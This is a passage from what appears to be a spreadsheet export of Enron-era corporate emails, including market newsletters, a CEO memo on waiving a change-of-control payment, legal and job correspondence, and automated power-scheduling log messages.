5-year note       4.85%     + 8/32_x000D_
10-year note      5.30%    + 10/32_x000D_
30-year bond      5.65%    + 15/32_x000D_
_x000D_
The tables above look best when viewed in a fixed-width font,_x000D_
such as "Courier."_x000D_
_x000D_
================================================================_x000D_
_x000D_
U.S. TRADING SUMMARY_x000D_
_x000D_
Technology stocks continue to gain steam from this morning's_x000D_
rally, which was triggered after a duo of tech companies, Xilinx_x000D_
and Comverse Technology, boosted hopes that the bad news on_x000D_
technology spending may be coming to an end. This helped bolster_x000D_
investor confidence despite the weak economic data that was_x000D_
released this morning. Semiconductors, networkers and software_x000D_
stocks all powered the NASDAQ higher for an almost 3% gain._x000D_
General market sectors bucking the upward trend were mostly_x000D_
defensive in nature and included electricity, natural gas and_x000D_
tobacco shares. While it took them a little while longer to join_x000D_
the tech party, both the Dow and S&amp;P 500 crept higher throughout_x000D_
the morning._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
U.S. TREASURY SUMMARY_x000D_
_x000D_
Treasuries were enjoying another day in the green at midday as a_x000D_
bout of weak economic data helped all maturities rally and mostly_x000D_
ignore the gains in the stock market. Trading remained thin and_x000D_
lackluster as typical summer doldrums continued to thwart_x000D_
liquidity. Shorter-dated issues received a boost from the Federal_x000D_
Reserve's purchase of Treasury bills. Longer-dated issues have_x000D_
been cheered from weakness in the factory orders report and data_x000D_
on the non-manufacturing sector._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
CURRENCY SUMMARY_x000D_
_x000D_
The euro has managed to recover to around the 0.850 dollar level,_x000D_
with dealers reporting a U.S.-based fund behind the move higher._x000D_
While it may be a bit premature, currency intervention tends to_x000D_
work better when it goes along with the market. As such, today's_x000D_
bounce from cycle lows could give the European Central Bank the_x000D_
latitude to intervene and boost the value of the euro. The dollar_x000D_
is little changed versus the yen when compared with morning_x000D_
levels. The pair is trading at about 120.3 yen._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
MAJOR COMPANY / INDUSTRY NEWS_x000D_
(All prices as of 1:05 p.m. EDT)_x000D_
_x000D_
** Lucent Technologies (LU: 8.62, + 0.62), which recently spurned_x000D_
a takeover offer from Alcatel (ALA: 26.15, + 0.77), plans to_x000D_
speed up cost-cutting measures. However, specifics of the_x000D_
cost-cutting plan were not revealed. Henry Schacht, the firm's_x000D_
chief executive and chairman, also said that Lucent does not plan_x000D_
to go after other merger possibilities. In his comments at an_x000D_
industry trade show, he reaffirmed fiscal guidance for the fiscal_x000D_
third quarter, saying that the firm should see a modest revenue_x000D_
improvement compared with the second quarter._x000D_
_x000D_
** Nortel Networks (NT: 13.73, - 0.25) will link with software_x000D_
titan Microsoft (MSFT: 72.30, + 1.52) in order to combine_x000D_
technologies and bring such broad-ranging services as e-mail and_x000D_
supply-chain management to phone carriers that can then sell the_x000D_
Internet-related services. The blending of technologies is_x000D_
designed to streamline data center operations and has been in_x000D_
advanced testing and joint research for about 12 months. Such_x000D_
testing was implemented in order to ensure product_x000D_
compatibility._x000D_
_x000D_
** Blockbuster (BBI: 21.52, - 0.29), the largest video-rental_x000D_
chain in the world, is offering to settle lawsuits that stemmed_x000D_
from customers paying inflated fees for overdue video rentals_x000D_
with the company unfairly profiting as a result. The offer to_x000D_
settle 23 class-action lawsuits entails Blockbuster offering both_x000D_
refunds and certificates for free video rentals as well as $1 off_x000D_
coupons for non-food items. Given the time and money required to_x000D_
defend the lawsuits, Blockbuster decided to settle the cases._x000D_
_x000D_
** General Mills (GIS: 42.83, + 0.03), maker of such breakfast_x000D_
staples as Wheaties, Total and Cheerios, is increasing its prices_x000D_
by an average of 2%. The price hike will amount to about $0.06 or_x000D_
$0.07 a box and is the result of higher energy, ingredient and_x000D_
packaging costs. General Mills last increased prices in April_x000D_
1999, when the company hiked prices by 2.5%._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
RESEARCH SPOTLIGHTS_x000D_
_x000D_
** Goldman Sachs upgraded shares of SAP AG (SAP: 37.46, + 0.96)_x000D_
from a market outperformer rating to their European recommended_x000D_
list._x000D_
_x000D_
** Lehman Brothers upgraded shares of J.C. Penney (JCP: 22.77, +_x000D_
2.09) from a buy to a strong buy rating._x000D_
_x000D_
** Needham &amp; Co. upgraded shares of Sypris Solutions (SYPR: 7.29,_x000D_
- 0.93) from a hold to a buy rating._x000D_
_x000D_
################################################################_x000D_
_x000D_
Log in using the links below to:_x000D_
_x000D_
Access your account:_x000D_
https://investing.schwab.com/trading/start?SANC=CCBodyi&amp;NeedCASelValue=Y_x000D_
_x000D_
View your Email Alert customization options:_x000D_
https://investing.schwab.com/trading/start?SANC=EAMyAlerts_x000D_
_x000D_
Perform research or request a market quote:_x000D_
https://investing.schwab.com/trading/start?SANC=Quotes_x000D_
_x000D_
Place a trade order:_x000D_
https://investing.schwab.com/trading/start?SANC=TradeStock_x000D_
_x000D_
To visit Schwab's home page, use this link:_x000D_
http://www.schwab.com/_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
_x000D_
To unsubscribe or modify your Email Alert customization options,_x000D_
log in using the link below or copy and paste it into your_x000D_
browser's address window:_x000D_
_x000D_
https://investing.schwab.com/trading/start?SANC=EAMyAlerts_x000D_
_x000D_
Now you can receive graphics Email Alerts in HTML format,_x000D_
using helpful, full-color graphics and active Web links that_x000D_
connect you directly to information you want. Use the link_x000D_
below to log in and change your email format preference:_x000D_
_x000D_
https://investing.schwab.com/trading/start?SANC=EAEditEmailAddr_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
Notice: All email sent to or from the Charles Schwab corporate_x000D_
email system may be retained, monitored and/or reviewed_x000D_
by Schwab personnel. (1000-8752)_x000D_
_x000D_
Copyright 2001 Standard &amp; Poor's MMS Inc.  All rights reserved._x000D_
Standard &amp; Poor's MMS services are for personal use only._x000D_
Commercial use or redistribution in any form, print or_x000D_
electronic, is prohibited._x000D_
Distribution by Quris, Inc.</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 03:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--3/28/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 03/28/2001 _x000D_
11:37 AM ---------------------------_x000D_
From: Veronica Espinoza/ENRON@enronXgate on 03/28/2001 09:19 AM_x000D_
To: Janie Aguayo/HOU/ECT@ECT, Diane Anderson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, David Baumbach/HOU/ECT@ECT, Jean Bell/HOU/ECT@ECT, _x000D_
Patricia Boulanger/CAL/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Julie _x000D_
Brewer/NA/Enron@Enron, Lesli Campbell/ENRON@enronXgate, Celeste _x000D_
Cisneros/NA/Enron@Enron, Sharon Crawford/CAL/ECT@ECT, Richard _x000D_
Deming/NA/Enron@Enron, Russell Diamond/ENRON@enronXgate, Cindy _x000D_
Feldman/CAL/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Veronica _x000D_
Gonzalez/ENRON@enronXgate, Jeffrey C Gossett/HOU/ECT@ECT, Walter _x000D_
Guidroz/ENRON@enronXgate, Larry Joe Hunter/HOU/ECT@ECT, Kam _x000D_
Keiser/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, Nidia Mendoza/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Bianca Ornelas/NA/Enron@Enron, Leslie _x000D_
Reeves/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Dianne Seib/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Ellen _x000D_
Wallumrod/NA/Enron@ENRON, Melinda Whalen/CAL/ECT@ECT, Tiffany _x000D_
Williams/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Credit Report--3/28/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 16:15:18 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
As many of you know, I have a provision in my employment contract which provides for a payment of $20 million per year for the remaining term of my contract in the event of a change of control of Enron.  The merger with Dynegy, or a similar transaction with any other company, would trigger this provision on closing.  Assuming the merger with Dynegy is closed within 6-9 months, as we expect, this provision would entitle me to total payments of slightly more than $60 million._x000D_
_x000D_
Many CEOs have change of control provisions in their employment contracts and mine has been in place since 1989.  But given the current circumstances facing the company and our employees, I have been giving a lot of thought these last few days to what to do about this payment.  Initially, I thought I would use part of the funds for a foundation for our employees and take the remainder in stock and cash.  However, after talking to a number of employees this afternoon, I have decided that the best course of action would be for me to waive my right to any of this payment.  Therefore, at closing, I will receive no payments under this provision._x000D_
_x000D_
I know this action does not remedy the uncertainty that you and your families face.  But please know that I will continue to do everything in my power to serve the best interests of Enron's employees and shareholders.  I am still very proud of what we have built at Enron, and I want to continue working with all of you to correct the problems and restore Enron to its rightful place in the energy industry._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 08:10:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Action Items</t>
  </si>
  <si>
    <t>Chris:_x000D_
_x000D_
Confirming our discussion, there are 2 things that I want to make sure happen Monday and Tuesday this week:_x000D_
_x000D_
1.  Harbor gets paid for Oct.  The amount is      $185,631.78 _x000D_
2.  Caroline is going to get me final numbers for Nov. Harbor so I can put in the Services Desk Profit Annuity._x000D_
_x000D_
C</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 10:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mathew.moses@compaq.com'})</t>
  </si>
  <si>
    <t>Re: Trading position</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your note and resume.  I have sent a copy to our Managing Director _x000D_
of Global Financial Trading.  He is in our London office this week, with a _x000D_
pretty demanding schedule, so it may be early next week before I hear back _x000D_
from him with regard to his interest.  I look forward to talking with you _x000D_
tomorrow.  Best time to reach me would be around 2:00 pm.  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Moses, Mathew" &lt;Mathew.Moses@COMPAQ.com&gt; on 04/02/2001 02:01:51 AM_x000D_
To: Sally.beck@enron.com_x000D_
cc:  _x000D_
Subject: Trading position_x000D_
_x000D_
_x000D_
Dear Sally,_x000D_
_x000D_
Thank you for agreeing to review my resume and qualifications for a position_x000D_
at Enron.  Your company has a fine reputation for innovation and growth._x000D_
I will call you Tuesday afternoon concerning any questions we both may have_x000D_
and to arrange an interview if we deem it is appropriate at that time._x000D_
I appreciate you consideration and look forward to meeting you._x000D_
_x000D_
Sincerely,_x000D_
Matt Moses_x000D_
(936) 273-3732 Home_x000D_
(281) 518-3036 Work_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;Sally_Beck Cover Letter.doc&gt;&gt;  &lt;&lt;MMoses_trader.doc&gt;&gt;_x000D_
_x000D_
 - Sally_Beck Cover Letter.doc_x000D_
 - MMoses_trader.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 14:45:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'weekly-admin@smartmoneylist.com'})</t>
  </si>
  <si>
    <t>frozenset({'weeklywrap-text@mailing.smartmoneylist.com'})</t>
  </si>
  <si>
    <t>The SmartMoney.com Week on the Street</t>
  </si>
  <si>
    <t xml:space="preserve">-- http://www.smartmoney.com/ --_x000D_
======================================================================_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
Week on the Street_x000D_
June 8, 2001_x000D_
----------------------------------------------------------------------------_x000D_
IN THIS EDITION:_x000D_
* THE MARKET CLOSE_x000D_
* MUTUAL-FUND NEWS_x000D_
* EDITORS' CHOICE_x000D_
* SPECIAL OFFER_x000D_
************************************************************_x000D_
************************************************************_x000D_
MARKET CLOSE:_x000D_
Tech Profit Pessimism Hits Stocks_x000D_
By Lawrence Carrel_x000D_
A software glitch halted trading on the NYSE for 1 1/2 hours._x000D_
After it resumed, selling accelerated._x000D_
http://www.smartmoney.com/bn/index.cfm?story=20010608070930_x000D_
&lt;a href="http://www.smartmoney.com/bn/index.cfm?story=20010608070930"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
ADVERTISEMENT_x000D_
Weed out the dead weight of the S&amp;P 500 and grow your portfolio_x000D_
at the same time. SelectSector SPDRs are low-cost, tax-efficient_x000D_
ETFs that let you invest in the best pieces of the S&amp;P 500. Pick_x000D_
and weight the sectors that make sense to you @ http://www.spdrindex.com_x000D_
&lt;a href="http://www.spdrindex.com"&gt;AOL USERS, CLICK HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
MUTUAL-FUND NEWS:_x000D_
Week in Funds: Some Good News in Tech Land_x000D_
http://www.smartmoney.com/fundinsight/weekinfunds/index.cfm?story=200106081_x000D_
&lt;a href="http://www.smartmoney.com/fundinsight/weekinfunds/index.cfm?story=200106081"&gt;AOL_x000D_
USERS, CLICK HERE&lt;/a&gt;_x000D_
_x000D_
Fund Insight: Using Technology to Excel in Technology_x000D_
http://www.smartmoney.com/fundinsight/index.cfm?story=200106071_x000D_
&lt;a href="http://www.smartmoney.com/fundinsight/index.cfm?story=200106071"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Stock Pickers: Value, With a Touch of Growth_x000D_
http://www.smartmoney.com/stockpickers/index.cfm?story=20010605_x000D_
&lt;a href="http://www.smartmoney.com/stockpickers/index.cfm?story=20010605"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Fund FAQs: Are Foreign Funds Worth the Trip?_x000D_
http://www.smartmoney.com/fundfaqs/index.cfm?story=20010606_x000D_
&lt;a href="http://www.smartmoney.com/fundfaqs/index.cfm?story=20010606"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Funds of the Week: Value Funds With Room to Run_x000D_
http://www.smartmoney.com/fundscreen/index.cfm?story=20010604_x000D_
&lt;a href="http://www.smartmoney.com/fundscreen/index.cfm?story=20010604"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
ADVERTISEMENT_x000D_
Turn rising energy prices into 100% gains in six months!_x000D_
ChangeWave investors are getting "1999 tech-like" returns from_x000D_
5 little known energy stocks. Now's your turn to join the party._x000D_
Discover more in the FREE special report: "Profiting from the_x000D_
Exploding Energy ChangeWave." Access your FREE copy online at:_x000D_
http://www.changewave.com/b/6/smw/_x000D_
&lt;a href="http://www.changewave.com/b/6/smw/"&gt;AOL USERS, CLICK HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
EDITORS' CHOICE:_x000D_
Consumer Action: College Savings Without the Tax Bite_x000D_
By Stephanie AuWerter_x000D_
Now with tax-free withdrawals, "529 plans" look better than_x000D_
ever. Here's how to find a good one._x000D_
http://www.smartmoney.com/consumer/index.cfm?story=200106084_x000D_
&lt;a href="http://www.smartmoney.com/consumer/index.cfm?story=200106084"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Stock Close-Up: It's Not Like Bezos Isn't Trying_x000D_
By Robert Hunter_x000D_
Amazon's CEO still desperately wants your love. But that profit_x000D_
prediction? Maybe next year._x000D_
http://www.smartmoney.com/stockcloseup/index.cfm?story=20010608_x000D_
&lt;a href="http://www.smartmoney.com/stockcloseup/index.cfm?story=20010608"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Is Biotech Finally Going Its Own Way?_x000D_
By Rebecca Thomas_x000D_
Tech and biotech tend to move in lockstep. But this rally may_x000D_
be different for some very good reasons._x000D_
http://www.smartmoney.com/stockwatch/index.cfm?story=200106072_x000D_
&lt;a href="http://www.smartmoney.com/stockwatch/index.cfm?story=200106072"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Tradecraft: The Patience Principle_x000D_
By Jonathan Hoenig_x000D_
Trading is all about split-second decisions, right? Not if you_x000D_
want to make the big money it isn't._x000D_
http://www.smartmoney.com/tradecraft/index.cfm?story=20010607_x000D_
&lt;a href="http://www.smartmoney.com/tradecraft/index.cfm?story=20010607"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Stock Screen: Rising Expectations_x000D_
By Monica Rivituso_x000D_
When a company's profit outlook is improving, its stock performance_x000D_
is likely to follow suit. We've uncovered 17 that might be on the_x000D_
verge of a pop._x000D_
http://www.smartmoney.com/stockscreen/index.cfm?story=20010606intro_x000D_
&lt;a href="http://www.smartmoney.com/stockscreen/index.cfm?story=20010606intro"&gt;AOL USERS,_x000D_
CLICK HERE&lt;/a&gt;_x000D_
_x000D_
Tech Market: We Can't See the Trees for the Forest_x000D_
By Tiernan Ray_x000D_
Worrying about the economic big picture won't help you figure_x000D_
out what you really need to know about tech companies._x000D_
http://www.smartmoney.com/techmarket/index.cfm?Story=20010606_x000D_
&lt;a href="http://www.smartmoney.com/techmarket/index.cfm?Story=20010606"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Stock Watch: Death and Taxes_x000D_
By Michael DeSenne_x000D_
When it comes to investing, sometimes it pays to remember_x000D_
life's inevitables._x000D_
http://www.smartmoney.com/stockwatch/index.cfm?story=200106051_x000D_
&lt;a href="http://www.smartmoney.com/stockwatch/index.cfm?story=200106051"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
The Economy: Panacea or Placebo?_x000D_
By Rebecca Thomas_x000D_
Washington says the Bush tax rebate will cure our ailing economy._x000D_
It'll help -- but not as much as it might have._x000D_
http://www.smartmoney.com/theeconomy/index.cfm?Story=200106051_x000D_
&lt;a href="http://www.smartmoney.com/theeconomy/index.cfm?Story=200106051"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
_x000D_
Consumer Action: When the Grim Job Reaper Comes Calling_x000D_
By Stacey L. Bradford_x000D_
From health insurance to retirement plans, here's what you need_x000D_
to know if you get laid off._x000D_
http://www.smartmoney.com/consumer/index.cfm?story=20010601_x000D_
&lt;a href="http://www.smartmoney.com/consumer/index.cfm?story=20010601"&gt;AOL USERS, CLICK_x000D_
HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
SmartMoney Challenge_x000D_
Looking for new stocks to buy? Take a peek at the portfolios of_x000D_
fund managers from Merrill Lynch, Salomon Smith Barney and Morgan_x000D_
Stanley. See if your own portfolio beats theirs as they square-off_x000D_
in our yearlong trading contest! http://www.smartmoney.com/challenge_x000D_
&lt;a href="http://www.smartmoney.com/challenge"&gt;AOL USERS, CLICK HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
GREAT GIFT IDEA:_x000D_
The gift of Financial Wisdom is now available for a price: $15 a year._x000D_
This Father's Day or Graduation give SmartMoney, The Wall Street Journal_x000D_
Magazine of Personal Business and save 58% off the cover price. Visit_x000D_
today for details now, and your gift will be in the mail._x000D_
http://ccare.hearstmags.com/cgi-bin/absplit.cgi?SplitFile=smygiftfg.urls_x000D_
&lt;a href="http://ccare.hearstmags.com/cgi-bin/absplit.cgi?SplitFile=smygiftfg.urls"&gt;AOL USERS,_x000D_
CLICK HERE&lt;/a&gt;_x000D_
----------------------------------------------------------------------------_x000D_
SPECIAL INVESTMENT OFFER: How much would it cost you to receive unbiased,_x000D_
rigorously investigated financial information every month from the best_x000D_
financial journalists in the business? Well the editors of The Wall Street_x000D_
Journal are waiting to send you their magazine of personal business, SmartMoney,_x000D_
for a mere $1.25 a month. Filled with insights and tips aimed at improving_x000D_
your bottom line, it could be the one financial investment you can't afford_x000D_
to miss. For details, visit here now:_x000D_
http://ccare.hearstmags.com/cgi-bin/absplit.cgi?SplitFile=smynewsletter.urls_x000D_
&lt;a href="http://ccare.hearstmags.com/cgi-bin/absplit.cgi?SplitFile=smynewsletter.urls"&gt;AOL USERS,_x000D_
CLICK HERE&lt;/a&gt;_x000D_
************************************************************_x000D_
************************************************************_x000D_
Soon, we will begin offering this newsletter in HTML format. If you wish_x000D_
to continue receiving the plain-text version of this email, please visit_x000D_
http://www.smartmoney.com/mailinglist/index.cfm?story=maileradmin_x000D_
to set your preferences._x000D_
_x000D_
If you have an AOL address you're already set to receive the newsletter_x000D_
in text. No action is required on your part._x000D_
_x000D_
Thank you,_x000D_
The SmartMoney.com Staff_x000D_
_x000D_
_x000D_
_x000D_
==============================================================_x000D_
JOINING AND LEAVING THE LIST_x000D_
_x000D_
Use the form on our site to join or leave our mailing lists:_x000D_
http://www.smartmoney.com/mailinglist/index.cfm?story=maileradmin_x000D_
&lt;a href="http://www.smartmoney.com/mailinglist/index.cfm?story=maileradmin"&gt;AOL USERS, CLICK HERE&lt;/A&gt;_x000D_
_x000D_
If you have any questions or problems, please email us at:_x000D_
	helplist@smartmoneylist.com_x000D_
_x000D_
================================================================_x000D_
SmartMoney.com ? 2001 SmartMoney._x000D_
SmartMoney is a joint publishing venture of Dow Jones &amp; Company,_x000D_
Inc. and Hearst Communications, Inc. </t>
  </si>
  <si>
    <t>Wed, 9 May 2001 23:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Covered Bonds Strategy</t>
  </si>
  <si>
    <t>(See attached file: cbs.pdf)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
 - cbs.pdf</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 09:39:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laura.lantefield@enron.com', 'lillian.villarreal@enron.com', 'w..mcgowan@enron.com', 'donna.scott@enron.com', 'dorothy.mccoppin@enron.com', 'jody.warner@enron.com', 'lisa.sawyer@enron.com', 'jim.talcott@enron.com', 'michele.winckowski@enron.com', 'rob.wilson@enron.com', 'frazier.king@enron.com', 'zelda.paschal@enron.com', 'kay.miller@enron.com', 'eva.neufeld@enron.com', 'tim.kissner@enron.com', 'robert.kilmer@enron.com', 'linda.robertson@enron.com', 'j..kean@enron.com', 'robert.hill@enron.com', 'phil.lowry@enron.com', 'lorna.brennan@enron.com', 'james.saunders@enron.com', 'louis.soldano@enron.com', 'dan.pribble@enron.com', 'martha.janousek@enron.com', 'staci.holtzman@enron.com', 'mike.van@enron.com', 'teb.lokey@enron.com', 'denis.tu@enron.com', 'shelley.corman@enron.com', 'sheila.nacey@enron.com', 'kimberly.watson@enron.com', 'elizabeth.linnell@enron.com', 'gregory.porter@enron.com', 'jack.boatman@enron.com', 'lindy.donoho@enron.com', 'ray.neppl@enron.com', 'donna.martens@enron.com', 'dave.neubauer@enron.com', 'alan.comnes@enron.com', 'geneva.patterson@enron.com', 'janet.place@enron.com', 'martha.benner@enron.com', 'sharon.farrell@enron.com', 'robert.hayes@enron.com', 'sarah.novosel@enron.com', 'rika.imai@enron.com', 'stephen.veatch@enron.com', 'rick.dietz@enron.com', 'kim.wilkie@enron.com', 'lon.stanton@enron.com', 'nancy.bagot@enron.com', 'l..nicolay@enron.com', 'karina.prizont@enron.com', 'michael.loeffler@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'rod.hayslett@enron.com', 'kathy.ringblom@enron.com', 'bradley.holmes@enron.com', 'janet.butler@enron.com', 'tamara.hopkins@enron.com', 'donald.vignaroli@enron.com', 'john.dushinske@enron.com', 'steve.kirk@enron.com', 'christi.culwell@enron.com', 'john.shafer@enron.com', 'gina.taylor@enron.com', 'stanley.horton@enron.com', 'keith.petersen@enron.com', 'colleen.raker@enron.com', 'drew.fossum@enron.com', 'richard.shapiro@enron.com', 'theresa.hess@enron.com', 'ets &lt;.nelson@enron.com&gt;', 'd..steffes@enron.com', 'lee.huber@enron.com', 'blair.lichtenwalter@enron.com', 'maria.pavlou@enron.com', 'ruth.mann@enron.com', 'steve.january@enron.com', 'randy.rice@enron.com', 'mary.darveaux@enron.com', 'ranelle.paladino@enron.com', 'lynn.blair@enron.com', 'bambi.heckerman@enron.com', 'bret.fritch@enron.com', 'dari.dornan@enron.com', 'tony.pryor@enron.com', 'joe.hartsoe@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Merry Christmas and Happy New Year to all. This report is the last of the year. The next report is scheduled for Monday, January 7 and then we will move to Fridays, as typical._x000D_
_x000D_
Please click below for access to the report._x000D_
_x000D_
http://gpgdomino.ots.enron.com/QuickPlace/ferc/Main.nsf/h_D81B4CBF5274062486256A3F006CC362/3BE8DD59EDF33A5F86256B2900608EEC?OpenDocument&amp;Form=h_PageUI_x000D_
_x000D_
For those wishing to view the Word document, please click below to bring the document up:_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 06:44:56 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Waivers of Notices, Philippine subsidiaries</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the message below.  Thank you._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Esguerra, Angel  _x000D_
Sent:	Monday, October 29, 2001 3:47 PM_x000D_
To:	Derrick Jr., James_x000D_
Cc:	Pabilani, Eleonor; Tami Scrudder/ENRON_DEVELOPMENT@ENRON_x000D_
Subject:	Waivers of Notices, Philippine subsidiaries_x000D_
_x000D_
Dear Mr. Derrick, _x000D_
_x000D_
Attached for your signatures are waivers of notices to a Board meeting of  Enron Subic Power Corp. and 2 Board meetings of Enron Subic Power Corp. Under Philippine laws, directors of Philippine corporations must be notified of Board meetings prior to the meeting or waive notice of the same. Please print out the attached, sign above your name and fax the signed waivers to +632.813.73.43._x000D_
_x000D_
Thank you._x000D_
_x000D_
Angel Esguerra_x000D_
Senior Counsel, Enron Global Assets &amp; Services_x000D_
c/o Enron Power Philippines Corp._x000D_
3rd floor, Corinthian Plaza_x000D_
121 Paseo de Roxas, Legaspi Village_x000D_
1226 Makati City, Metro Manila, Philippines_x000D_
Tel.:	+63.2.810.46.31/+63.2.813.34.40/+63.917.489.05.43_x000D_
Fax:	+63.2.813.73.43/+63.2.811.31.85/+63.2.811.31.65_x000D_
e-mail:	Angel.M.Esguerra@enron.com_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jtompkins@iexalt.net'})</t>
  </si>
  <si>
    <t>frozenset({'chall@fulbright.com', 'piernotb@letu.edu', 'billw3@hypercon.com', 'bdietz@bflassociates.com', 'walter_saunders@agc.com', 'williamgtrulove@ev1.net', 'jrshirly@flash.net', 'bharper@harperpearson.com', 'rwoliver@txpetrochem.com', '105113.2130@compuserve.com', 'jrichardson@harperpearson.com', 'dbech@raintreesorts.com', 'ban_bury@swbell.net', 'eva_quearry@linbeck.com', 'd.stephen.goddard.jr@us.arthurandersen.com', 'mcguired@tpi-sourcing.com', 'davidhillsmith@worldnet.att.net', 'eattwell@velaw.com', 'heritage@wt.net', 'fvandiver@sterlingchemicals.com', 'rew@whplaw.com', 'bluesky@ghg.net', 'anne.b@worldnet.att.net', 'jeffm@netlan-inc.com', 'lpardue@att.net', 'mwatts@lockeliddell.com', 'emalliance@aol.com', 'mikeh@tescodrilling.com', 'jwhargrove@pdq.net', 'joel@tjens.com', 'cullum_david@msn.com', 'bgflynn@swbell.net', 'jpwise@ielectric.com', 'banbury3419@hotmail.com', 'pforbes@houston.rr.com', 'jahrens@dttus.com', 'cwyatt@dttus.com', 'jack.miller@basshotels.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>Houston Christian Business Group</t>
  </si>
  <si>
    <t>Attached is the notice for our October  meeting.?I hope to see you there._x000D_
?_x000D_
Jack Tompkins_x000D_
 - Houston Christian Business Group.doc</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 23:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/20/01; HourAhead hour: 7;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/20/01; HourAhead hour: 7;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042007.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing...</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 15:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/24/01; HourAhead hour: 23;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/24/01; HourAhead hour: 23;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
Variances detected in SC Trades schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042423.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 23 / Preferred:   0.00 / Final:   0.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
